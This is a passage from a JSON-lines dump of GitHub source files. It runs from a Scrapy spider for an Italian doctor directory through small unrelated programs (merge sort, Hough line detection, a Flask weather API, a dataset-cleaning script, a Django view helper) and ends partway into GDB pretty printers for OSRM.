liked_date.split(\"/\")[-1].strip()\r\n                if year in year_counts:\r\n                    year_counts[year][0] += 1\r\n                    year_counts[year][1] += 1\r\n            if each_review.css(\"header span+span.icon-unlike\"):\r\n                year = unliked_date.split(\"/\")[-1].strip()\r\n                if year in year_counts:\r\n                    year_counts[year][0] += 1\r\n\r\n        
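# NOTE (editor): the year bucketing above assumes the review date renders as\r\n        # 'dd/mm/yy', so the token after the last '/' is a two-digit year; liked and\r\n        # unliked review bubbles expose that date through different CSS selectors.\r\n        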
item['positive_review_number'] = positive_review_number\r\n        item['reviews_number_2021'] = year_counts['21'][0]\r\n        item['reviews_number_2020'] = year_counts['20'][0]\r\n        item['reviews_number_2019'] = year_counts['19'][0]\r\n        item['reviews_number_2018'] = year_counts['18'][0]\r\n        item['positive_review_number_2021'] = year_counts['21'][1]\r\n        item['positive_review_number_2020'] = year_counts['20'][1]\r\n        item['positive_review_number_2019'] = year_counts['19'][1]\r\n        item['positive_review_number_2018'] = year_counts['18'][1]\r\n        item[\"address_1\"] = None\r\n        item[\"city_1\"] = None\r\n        item['latitude_1'] = None\r\n        item['longitude_1'] = None\r\n        item[\"label_1\"] = None\r\n        item[\"address_2\"] = None\r\n        item[\"city_2\"] = None\r\n        item['latitude_2'] = None\r\n        item['longitude_2'] = None\r\n        item[\"label_2\"] = None\r\n        item[\"address_3\"] = None\r\n        item[\"city_3\"] = None\r\n        item['latitude_3'] = None\r\n        item['longitude_3'] = None\r\n        item[\"label_3\"] = None\r\n        item[\"address_4\"] = None\r\n        item[\"city_4\"] = None\r\n        item['latitude_4'] = None\r\n        item['longitude_4'] = None\r\n        item[\"label_4\"] = None\r\n        data = response.css(\"div[data-medical-centers]::attr(data-medical-centers)\").extract_first()\r\n        address_json = response.css('script[type=\"application/ld+json\"]::text').extract_first()\r\n        try:\r\n            json_data = json.loads(address_json)\r\n        except (TypeError, json.JSONDecodeError):\r\n            json_data = {}\r\n            print(\"json parsing error\")\r\n        for index, each_address in enumerate(json_data.get(\"hasPOS\") or []):\r\n\r\n            if index == 0:\r\n                item[\"address_1\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n                item[\"city_1\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n                item['latitude_1'] = each_address.get(\"geo\").get('latitude')\r\n                item['longitude_1'] = each_address.get(\"geo\").get('longitude')\r\n                item[\"label_1\"] = each_address.get('name')\r\n            if index == 1:\r\n                item[\"address_2\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n                item[\"city_2\"] = 
each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_2'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_2'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_2\"] = each_address.get('name')\r\n if index == 2:\r\n item[\"address_3\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_3\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_3'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_3'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_3\"] = each_address.get('name')\r\n if index == 3:\r\n item[\"address_4\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_4\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_4'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_4'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_4\"] = each_address.get('name')\r\n\r\n item[\"works_online\"] = True if response.css(\".doc-card__mode-label--video\") else False\r\n online_price_list = []\r\n offline_price_list = []\r\n if response.css(\"#tariffe #profile-health-service-preview\"):\r\n for each_price in response.css(\"#tariffe #profile-health-service-preview p\"):\r\n matches_offline = [\"online\", \"gruppo\", \"gruppi\", \"coppia\", \"coppie\", \"skype\", \"whatsapp\", \"internet\",\r\n \"video\"]\r\n matches_online = [\"online\", \"skype\", \"whatsapp\", \"internet\", \"video\"]\r\n if any(x in each_price.css(\"::text\").extract_first() for x in matches_online):\r\n if each_price.css(\".font-weight-normal::text\").extract_first():\r\n if \"da €\" in each_price.css(\".font-weight-normal::text\").extract_first():\r\n price_range = re.findall(\"[0-9]+\\.[0-9]+|[0-9]+\",\r\n each_price.css(\".font-weight-normal::text\").extract_first())\r\n online_price_list.append(int(self.get_index(price_range, 0).replace(\".\", \"\")))\r\n elif re.search(\"[0-9]+\\.[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()):\r\n online_price_list.append(int(self.get_index(re.findall(\"[0-9]+\", each_price.css(\r\n \".font-weight-normal::text\").extract_first().replace(\".\", \"\")), 0)))\r\n else:\r\n online_price_list.append(int(self.get_index(\r\n re.findall(\"[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()), 0)))\r\n if any(x in each_price.css(\"::text\").extract_first() for x in matches_offline):\r\n pass\r\n else:\r\n if each_price.css(\".font-weight-normal::text\").extract_first() == None or each_price.css(\r\n \".font-weight-normal::text\").extract_first() == \"\":\r\n pass\r\n else:\r\n if \"da €\" in each_price.css(\".font-weight-normal::text\").extract_first():\r\n price_range = re.findall(\"[0-9]+\\.[0-9]+|[0-9]+\",\r\n each_price.css(\".font-weight-normal::text\").extract_first())\r\n offline_price_list.append(int(self.get_index(price_range, 0).replace(\".\", \"\")))\r\n elif re.search(\"[0-9]+\\.[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()):\r\n offline_price_list.append(int(self.get_index(re.findall(\"[0-9]+\", each_price.css(\r\n \".font-weight-normal::text\").extract_first().replace(\".\", \"\")), 0)))\r\n else:\r\n offline_price_list.append(int(\r\n self.get_index(\r\n re.findall(\"[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()),\r\n\r\n 0)))\r\n if online_price_list:\r\n item[\"price_online\"] = min(online_price_list)\r\n else:\r\n item[\"price_online\"] 
= None\r\n if offline_price_list:\r\n item[\"price_offline\"] = min(offline_price_list)\r\n else:\r\n item[\"price_offline\"] = None\r\n item[\"telephone_1\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 0)\r\n item[\"telephone_2\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 1)\r\n item[\"telephone_3\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 2)\r\n item[\"email\"] = None\r\n item[\"website\"] = None\r\n item[\"description\"] = \"\".join(response.css(\".doc-text-box p::text\").extract())\r\n item[\"conditions\"] = \",\".join(response.css(\"#patologie p::text\").extract())\r\n specalization_list = []\r\n for each in response.css(\"#patologie ul li\"):\r\n if each.css(\"li span[data-placement]\"):\r\n specalization_list.append(each.css(\"li p::text\").extract_first())\r\n item[\"specialties\"] = \",\".join(specalization_list)\r\n item[\"ages_treated\"] = None\r\n item[\"therapy_type\"] = None\r\n item[\"social_instagram\"] = None\r\n item[\"social_facebook\"] = None\r\n item[\"social_linkedin\"] = None\r\n item[\"does_qa\"] = None\r\n item[\"albo\"] = None\r\n item[\"albo_numero\"] = None\r\n item[\"has_publications\"] = None\r\n item[\"photo\"] = response.css(\".doc-photo img::attr(data-src)\").extract_first()\r\n item[\"photo_large\"] = None\r\n item[\"qualifications_dottori.it\"] = \",\".join(\r\n response.css(\".profile-header-card__profile h1+div span::text\").extract())\r\n for each in response.css(\".mb-3\"):\r\n if 'Abilitazione' in each.css(\"h4 strong::text\").extract():\r\n item[\"albo\"] = \" \".join([w for w in each.css(\"ul li::text\").extract_first().split() if not w.isdigit()])\r\n item[\"albo_numero\"] = self.get_index(re.findall(\"[0-9]+\", each.css(\"ul li::text\").extract_first()), 0)\r\n item[\"website\"] = response.css(\".website-link::attr(href)\").extract_first()\r\n file_name = \"dottori_it.csv\"\r\n file_exists = os.path.isfile(file_name)\r\n with open(file_name, 'a', encoding=\"utf-8\") as csvfile:\r\n headers = item.keys()\r\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n', fieldnames=headers)\r\n if not file_exists:\r\n writer.writeheader() # file doesn't exist yet, write a header\r\n writer.writerow(item)\r\n yield\r\n","repo_name":"m-mohsin-iqbal/dottori_it_scraper","sub_path":"dottori_it/spiders/miodottore_spider.py","file_name":"miodottore_spider.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23346115546","text":"n=int(input())\n\nl=[]\nfor i in range(n):\n l.append(int(input()))\n \n#duplicate by frequncy \ndict={}\n\nfor i in range(n):\n dict[l[i]]=l.count(l[i])\n #frequency....\n # if l.count(l[i])>1:\n # print('duplicate:',l[i])\n \n#values..\n# print(dict.items())\n\nfor k,v in dict.items():\n # print(k,v)\n if v>1:\n print(k)\n\n","repo_name":"showribabu/Programms","sub_path":"ass_5.4_.py","file_name":"ass_5.4_.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11880418161","text":"# -*-coding:utf-8-*-\r\n\r\n# ===============================================================================\r\n# 用于两类数据集清洗\r\n# sod数据集\r\n# ===============================================================================\r\n\r\nimport os\r\nimport time\r\nimport difflib\r\nimport hashlib\r\nimport stat\r\n\r\n\r\ndef getFileMd5(filename):\r\n if not 
os.path.isfile(filename):\r\n        print('file does not exist: ' + filename)\r\n        return\r\n    myhash = hashlib.md5()\r\n    f = open(filename, 'rb')\r\n    while True:\r\n        b = f.read(8096)\r\n        if not b:\r\n            break\r\n        myhash.update(b)\r\n    f.close()\r\n    return myhash.hexdigest()\r\n\r\n\r\ndef getAllFiles(path):\r\n    flist = []\r\n    for root, dirs, fs in os.walk(path):\r\n        for f in fs:\r\n            f_fullpath = os.path.join(root, f)\r\n            f_relativepath = f_fullpath[len(path):]\r\n            flist.append(f_relativepath)\r\n    return flist\r\n\r\n\r\ndef dirCompare(apath, bpath):\r\n    afiles = getAllFiles(apath)\r\n    bfiles = getAllFiles(bpath)\r\n\r\n    setA = set(afiles)\r\n    setB = set(bfiles)\r\n\r\n    # commonfiles = setA & setB  # handle files common to both directories\r\n\r\n    # for f in sorted(commonfiles):\r\n    #     amd=getFileMd5(apath+'\\\\'+f)\r\n    #     bmd=getFileMd5(bpath+'\\\\'+f)\r\n    #     if amd != bmd:\r\n    #         print (\"dif file: %s\" %(f))\r\n\r\n    # handle files that appear in only one of the two directories\r\n    onlyFiles = setA ^ setB\r\n    onlyInA = []\r\n    onlyInB = []\r\n    thislist = []\r\n\r\n    for of in onlyFiles:\r\n        if of in afiles:\r\n            onlyInA.append(of)\r\n        elif of in bfiles:\r\n            onlyInB.append(of)\r\n\r\n    if len(onlyInA) > 0:\r\n        print('-' * 20, \"only in A\", apath, '-' * 20, len(onlyInA))\r\n        for of in sorted(onlyInA):\r\n            # print(of)\r\n            a = apath + of\r\n            thislist.append(a)\r\n\r\n    if len(onlyInB) > 0:\r\n        print('-' * 20, \"only in B\", bpath, '-' * 20, len(onlyInB))\r\n        for of in sorted(onlyInB):\r\n            # print(of)\r\n            b = bpath + of\r\n            thislist.append(b)\r\n\r\n    return thislist\r\n\r\n\r\ndef deleteFile(deletelist):\r\n    for i in deletelist:\r\n        if os.path.exists(i):\r\n            os.remove(i)\r\n\r\nif __name__ == '__main__':\r\n    from mypath import Path\r\n    root = Path.db_root_dir('small_obstacle')\r\n    # root = 'F:/Small_Obstacle_Dataset/'\r\n    splits = ['train','val','test']\r\n    deleteList = []\r\n\r\n    for split in splits:\r\n        trainSeq = os.listdir(os.path.join(root, split))\r\n        for seq in trainSeq:\r\n            imagePath = os.path.join(root, split, seq, 'image')\r\n            labelPath = os.path.join(root, split, seq, 'labels')\r\n\r\n            # labelPath = r'F:\\Small_Obstacle_Dataset\\train\\file_3\\labels'\r\n            # imagePath = r'F:\\Small_Obstacle_Dataset\\train\\file_3\\image'\r\n            #\r\n            tmp = dirCompare(imagePath, labelPath)\r\n            deleteList.extend(tmp)\r\n\r\n    print(deleteList)\r\n    # import pickle\r\n    # pickle.dump(deleteList,open('deletefiles','wb'))\r\n    file = open('C:/Users/LUTAO11/Desktop/deletefiles.txt','w')\r\n    for i in deleteList:\r\n        # print(type(i))\r\n        file.write(i)\r\n    file.close()\r\n\r\n    # thisf = 'F:/Small_Obstacle_Dataset/train/file_2/image/0000000035.png'\r\n    # os.chmod(thisf, stat.S_IRWXO)\r\n    # deleteFile(thisf)\r\n\r\n\r\n    for i in deleteList:\r\n        # os.path.normpath(i)\r\n        # i.replace(\"\\\\\", \"/\")\r\n        path, name = os.path.split(os.path.normpath(i))\r\n\r\n        os.chdir(path)\r\n        # elevate permissions before removing\r\n        os.chmod(name, stat.S_IRWXU)\r\n        # os.chmod(name, stat.S_IRWXO)\r\n\r\n        print(i)\r\n        # avoids PermissionError: [WinError 5] access denied: '/'\r\n        os.remove(name)\r\n    # aPath = r'F:\\Small_Obstacle_Dataset\\train\\seq_6\\labels'\r\n    # bPath = r'F:\\Small_Obstacle_Dataset\\train\\seq_6\\image'\r\n    # dirCompare(aPath, bPath)\r\n    print(\"\\ndone!\")\r\n","repo_name":"LT1st/SmallObstacleDetection","sub_path":"code/utils/clean_dataset.py","file_name":"clean_dataset.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21150575044","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = 
None\n        self.parent = None\n\"\"\"\n\nclass Solution:\n    def inorderSuccessor(self, node: 'Node') -> 'Node':\n        # Successor = leftmost node of the right subtree if one exists; otherwise\n        # the first ancestor we climb out of through a left child.\n        it = node\n        go_up_from_right = False\n        go_right = False\n\n        while not go_right:\n            if not go_up_from_right and it.right:\n                it = it.right\n                go_right = True\n            elif it.parent is None:\n                return None\n            elif it == it.parent.left:\n                return it.parent\n            else:\n                # climbing out of a right child: keep going up\n                go_up_from_right = True\n                it = it.parent\n\n        while it.left:\n            it = it.left\n\n        return it\n
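\n# Usage sketch (hypothetical 3-node tree, parent pointers wired by hand): for a root 1\n# with children 0 and 2, inorderSuccessor(root) descends right and returns node 2, and\n# inorderSuccessor(node 2) climbs past the root and returns None.\n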
","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/510. Inorder Successor in BST II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10530288428","text":"import random\n\ndef primary():\n    # print(\"Keep it logically awesome.\")\n\n    # read all quotes from the file\n    f = open(\"quotes.txt\")\n    quotes = f.readlines()\n    f.close()\n\n    # pick quotes randomly from the list\n    last = len(quotes) - 1\n    rnd = random.randint(0,last)\n\n    # print(quotes[rnd])\n\n    # print two quotes at a time\n    print(quotes[random.randint(0,last)], \"\\n\", quotes[random.randint(0,last)])\n    # len - 1 gives the last valid index regardless of file size,\n    # e.g. a 14-line file has last element index 13\n\nif __name__ == \"__main__\":\n    primary()\n","repo_name":"abarnaks/python-random-quote","sub_path":"get-quote.py","file_name":"get-quote.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29764113920","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\n\n\ndef line_detection_non_vectorized(image, edge_image, num_rhos=180, num_thetas=180):\n    edge_height, edge_width = edge_image.shape[:2]\n    edge_height_half, edge_width_half = edge_height / 2, edge_width / 2\n    #\n    d = np.sqrt(np.square(edge_height) + np.square(edge_width))\n    dtheta = (180 / num_thetas)\n    drho = ((2 * d) / num_rhos)\n    #\n    thetas = np.arange(0, 180, step=dtheta)\n    rhos = np.arange(-d, d, step=drho)\n    #\n    cos_thetas = np.cos(np.deg2rad(thetas))\n    sin_thetas = np.sin(np.deg2rad(thetas))\n    #\n    accumulator = np.zeros((len(rhos), len(thetas)))\n    #\n    output_img = np.zeros((edge_height, edge_width))\n    #\n    figure = plt.figure(figsize=(12, 12))\n    subplot1 = figure.add_subplot(1, 4, 1)\n    subplot1.imshow(image)\n    subplot2 = figure.add_subplot(1, 4, 2)\n    subplot2.imshow(edge_image, cmap=\"gray\")\n    subplot3 = figure.add_subplot(1, 4, 3)\n    subplot3.set_facecolor((0, 0, 0))\n    subplot4 = figure.add_subplot(1, 4, 4)\n    subplot4.imshow(output_img)\n    #\n    for y in range(edge_height):\n        for x in range(edge_width):\n            if edge_image[y][x] != 0:\n                edge_point = [y - edge_height_half, x - edge_width_half]\n                ys, xs = [], []\n                for theta_idx in range(len(thetas)):\n                    rho = (edge_point[1] * cos_thetas[theta_idx]) + (edge_point[0] * sin_thetas[theta_idx])\n                    theta = thetas[theta_idx]\n                    rho_idx = np.argmin(np.abs(rhos - rho))\n                    accumulator[rho_idx][theta_idx] += 1\n                    ys.append(rho)\n                    xs.append(theta)\n                subplot3.plot(xs, ys, color=\"white\", alpha=0.05)\n\n    out_img = image.copy()\n    # for y in range(accumulator.shape[0]):\n    #     for x in range(accumulator.shape[1]):\n    #         if accumulator[y][x] > t_count:\n    #             rho = rhos[y]\n    #             theta = thetas[x]\n    #             a = np.cos(np.deg2rad(theta))\n    #             b = np.sin(np.deg2rad(theta))\n    #             x0 = (a * rho) + edge_width_half\n    #             y0 = (b * rho) + edge_height_half\n    #             x1 = int(x0 + 100 * (-b))\n    #             y1 = int(y0 + 100 * (a))\n    #             x2 = int(x0 - 100 * (-b))\n    #             y2 = int(y0 - 100 * (a))\n    #             subplot3.plot([theta], [rho], marker='o', color=\"yellow\")\n    #             subplot4.add_line(mlines.Line2D([x1, x2], [y1, y2],color=\"white\"))\n    #             out_img=cv2.line(out_img,(x1,y1),(x2,y2),(255,255,255),1)\n    indices, top_thetas, top_rhos = peak_votes(accumulator, rhos, thetas, 50)\n    for i in range(len(indices)):\n        rho = top_rhos[i]\n        theta = top_thetas[i]\n        a = np.cos(np.deg2rad(theta))\n        b = np.sin(np.deg2rad(theta))\n        x0 = (a * rho) + edge_width_half\n        y0 = (b * rho) + edge_height_half\n        x1 = int(x0 + 200 * (-b))\n        y1 = int(y0 + 200 * (a))\n        x2 = int(x0 - 200 * (-b))\n        y2 = int(y0 - 200 * (a))\n        # subplot3.plot([theta], [rho], marker='o', color=\"yellow\")\n        out_img = cv2.line(out_img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n\n\n    cv2.imwrite(\"linesOutput2.jpg\", out_img)\n    # cv2.imshow(\"output\" ,out_img)\n    # cv2.imshow(\"input\",image)\n    # cv2.waitKey(0)\n\n    # subplot1.title.set_text(\"Original Image\")\n    # subplot2.title.set_text(\"Edge Image\")\n    # subplot3.title.set_text(\"Hough Space\")\n    # subplot4.title.set_text(\"Detected Lines\")\n    # plt.show()\n\ndef peak_votes(accumulator, rhos, thetas, n):\n    \"\"\" Return the indices, thetas and rhos of the n cells with the most votes in the hough accumulator \"\"\"\n    idx = np.argpartition(accumulator.flatten(), -n)[-n:]\n    indices = idx[np.argsort((-accumulator.flatten())[idx])]\n    top_rhos = rhos[(indices / accumulator.shape[1]).astype(int)]\n    top_thetas = thetas[indices % accumulator.shape[1]]\n\n    return indices, top_thetas, top_rhos\n\ndef hough_lines(path):\n    image = cv2.imread(path)\n    edge_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    edge_image = cv2.GaussianBlur(edge_image, (5, 5), 1)\n    edge_image = cv2.dilate(edge_image, (3, 3), iterations=1)\n    edge_image = cv2.Canny(edge_image, 100, 200)\n    line_detection_non_vectorized(image, edge_image)\n\nif __name__ == \"__main__\":\n    hough_lines(\"linesInput2.jpg\")\n\n\n","repo_name":"AhmedAdel21/Computer-Vision","sub_path":"Edge & line Detection/lines_hough.py","file_name":"lines_hough.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33379468382","text":"import shutil\ncolumns = shutil.get_terminal_size().columns\n\ndef Merge(array, copy, low, mid, high):\n    k, i = low, low\n    j = mid+1\n    while i<=mid and j<=high:\n        if array[i]<=array[j]:\n            copy[k] = array[i]\n            i += 1\n            k += 1\n        else:\n            copy[k]=array[j]\n            j += 1\n            k += 1\n    # fill in the remaining left-half elements; if the left half is exhausted\n    # first, k == j and the right remainder already sits in copy[j..high]\n    while i<=mid:\n        copy[k] = array[i]\n        i += 1\n        k += 1\n    for i in range(low, high+1):\n        array[i] = copy[i]\n\ndef MergeSort(array, copy, low, high):\n    if low == high:\n        return\n    mid = (low + ((high-low) >> 1))\n    #left\n    MergeSort(array, copy, low, mid)\n    #right\n    MergeSort(array, copy, mid+1, high)\n    #time to merge!\n    Merge(array, copy, low, mid, high)\n\ndef IsSorted(array):\n    prev = array[0]\n    for i in range(1, len(array)):  # use the list's own length instead of the global n\n        if prev > array[i]:\n            print(\"Merge Fails!!\")\n            return False\n        prev = array[i]\n    return True\n
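\n# Quick sanity check (hypothetical input, mirroring the interactive loop below):\n#   data = [5, 2, 9, 1]; buf = data.copy(); MergeSort(data, buf, 0, len(data) - 1)\n#   data is now [1, 2, 5, 9] and IsSorted(data) returns True\n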
[y/n]: \").lower()\n if ask == \"y\":\n continue\n elif ask == \"n\":\n exit()\n","repo_name":"CyberSpace-Cowboy/merge-sort","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12880024858","text":"# Import the dependencies.\nfrom flask import Flask, jsonify\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# Set up the database\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Reflect the database into new model\nBase = automap_base()\n\n# Reflect the tables from the database into the model\nBase.prepare(engine, reflect=True)\n\n# Save references to tables\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Set up Flask\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return (\n \"SurfsUp Welcome Page

    \"\n \"Available routes are:
    \"\n \"/api/v1.0/precipitation
    \"\n \"/api/v1.0/stations
    \"\n \"/api/v1.0/tobs
    \"\n \"/api/v1.0/
    \"\n \"/api/v1.0//\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-06-23').all()\n\n precipitation_data = {}\n for date, prcp in results:\n precipitation_data[date] = prcp\n\n return jsonify(precipitation_data)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n session = Session(engine)\n results = session.query(Station.station).all()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n session = Session(engine)\n results = session.query(Measurement.tobs).filter(Measurement.date >= '2016-06-23').filter(Measurement.station == 'USC00519281').all()\n\n tobs_data = [tobs[0] for tobs in results]\n\n return jsonify(tobs_data)\n\n\n@app.route(\"/api/v1.0/\")\ndef temp_stats_start(start):\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start).all()\n\n temp_stats = {\n 'min_temperature': results[0][0],\n 'max_temperature': results[0][1],\n 'avg_temperature': results[0][2]\n }\n\n return jsonify(temp_stats)\n\n\n@app.route(\"/api/v1.0//\")\ndef temp_stats_start_end(start, end):\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n\n temp_stats = {\n 'min_temperature': results[0][0],\n 'max_temperature': results[0][1],\n 'avg_temperature': results[0][2]\n }\n\n return jsonify(temp_stats)\n\n\n\nif __name__=='__main__':\n app.run(debug=True, port=5001)\n\n#################################################\n# Flask Routes\n#################################################\n","repo_name":"mavingill/SQL_Alchemy_Challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12045764398","text":"from apps.user.models import Orderdetail,Order,Goods,UserInfo\nclass object:\n picture = ''\n order = Orderdetail\n\n def __init__(self, pic, obj):\n self.picture = pic\n self.order = obj\nclass view:\n Sell=[]\n Buy=[]\n Ing_1=[]\n Ing_2=[]\n\n def __init__(self):\n self.Ing_1=[]\n self.Ing_2=[]\n self.Buy=[]\n self.Sell=[]\n\ndef indexview(c_id):\n\n s_order=Order.objects.filter(seller_id=c_id)#已卖物品\n b_order=Order.objects.filter(buyer_id=c_id)#已买物品\n t_order_1=[]#未收款物品\n t_order_2=[]#未收获物品\n t_view=view\n t_view.__init__(t_view)\n\n for entity in s_order:\n\n if entity.state=='finish':\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n s_object = object(picture, order)\n t_view.Sell.append(s_object)\n else:\n t_order_1.append(entity)\n\n for entity in b_order:\n\n if entity.state == 'finish':\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n b_object = object(picture, order)\n t_view.Buy.append(b_object)\n else:\n t_order_2.append(entity)\n\n for entity in t_order_1:\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n t_object = object(picture, order)\n t_view.Ing_1.append(t_object)\n\n for entity in t_order_2:\n order = 
Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n t_object = object(picture, order)\n t_view.Ing_2.append(t_object)\n return t_view\n\ndef countSelled(c_id):\n return Order.objects.filter(seller_id=c_id).count()\n\ndef not_inorder(name):\n goods=Goods.objects.filter(user_name=name)\n return goods.filter(state=\"not_in_order\")\ndef getincome(c_id):\n income=0\n for order in Order.objects.filter(seller_id=c_id):\n income=income +order.cost\n return income\n\n\n\n\n\n\n","repo_name":"gerayking/BuptFish","sub_path":"apps/user/Service/IndexService.py","file_name":"IndexService.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"30422130800","text":"import gdb.printing\n\n# https://sourceware.org/gdb/onlinedocs/gdb/Pretty-Printing.html\n# https://sourceware.org/gdb/onlinedocs/gdb/Writing-a-Pretty_002dPrinter.html\n\nCOORDINATE_PRECISION = 1e6\ncoord2float = lambda x: int(x) / COORDINATE_PRECISION\nlonlat = lambda x: (coord2float(x['lon']['__value']), coord2float(x['lat']['__value']))\n\ndef call(this, method, *args):\n \"\"\"Call this.method(args)\"\"\"\n if (str(this) == ''):\n raise BaseException('\"this\" is optimized out')\n command = '(*({})({})).{}({})'.format(this.type.target().pointer(), this.address, method, ','.join((str(x) for x in args)))\n return gdb.parse_and_eval(command)\n\ndef iterate(v):\n s, e = v['_M_impl']['_M_start'], v['_M_impl']['_M_finish']\n while s != e:\n yield s.dereference()\n s +=1\n\nclass CoordinatePrinter:\n \"\"\"Print a CoordinatePrinter object.\"\"\"\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n return '{{{}, {}}}'.format(*lonlat(self.val))\n\nclass TurnInstructionPrinter:\n \"\"\"Print a TurnInstruction object.\"\"\"\n\n modifiers = {0:'UTurn', 1:'SharpRight', 2:'Right', 3:'SlightRight',\n 4:'Straight', 5:'SlightLeft', 6:'Left', 7:'SharpLeft'}\n types = {0:'Invalid', 1:'NewName', 2:'Continue', 3:'Turn', 4:'Merge', 5:'OnRamp',\n 6:'OffRamp', 7:'Fork', 8:'EndOfRoad', 9:'Notification', 10:'EnterRoundabout',\n 11:'EnterAndExitRoundabout', 12:'EnterRotary', 13:'EnterAndExitRotary',\n 14:'EnterRoundaboutIntersection', 15:'EnterAndExitRoundaboutIntersection',\n 16:'UseLane', 17:'NoTurn', 18:'Suppressed', 19:'EnterRoundaboutAtExit',\n 20:'ExitRoundabout', 21:'EnterRotaryAtExit', 22:'ExitRotary',\n 23:'EnterRoundaboutIntersectionAtExit', 24:'ExitRoundaboutIntersection',\n 25:'StayOnRoundabout', 26:'Sliproad'}\n\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n t, m = int(self.val['type']), int(self.val['direction_modifier'])\n m = '%s (%d)' % (self.modifiers[m], m) if m in self.modifiers else str(m)\n t = '%s (%d)' % (self.types[t], t) if t in self.types else str(t)\n return '{{type = {}, direction_modifier = {}}}'.format(t, m)\n\nclass TurnLaneDataPrinter:\n \"\"\"Print a TurnLaneData object.\"\"\"\n\n mask = {0:'Empty', 1:'None', 2:'Straight', 4:'SharpLeft', 8:'Left', 16:'SlightLeft',\n 32:'SlightRight', 64:'Right', 128:'SharpRight', 256:'UTurn', 512:'MergeToLeft',\n 1024:'MergeToRight'}\n\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n tg = int(self.val['tag'])\n fr, to = int(self.val['from']), int(self.val['to'])\n return '{{tag = {}, from = {}, to = {}}}'.format(self.mask[tg] if tg in self.mask else tg, fr, to)\n\ndef build_pretty_printer():\n pp = gdb.printing.RegexpCollectionPrettyPrinter('OSRM')\n 
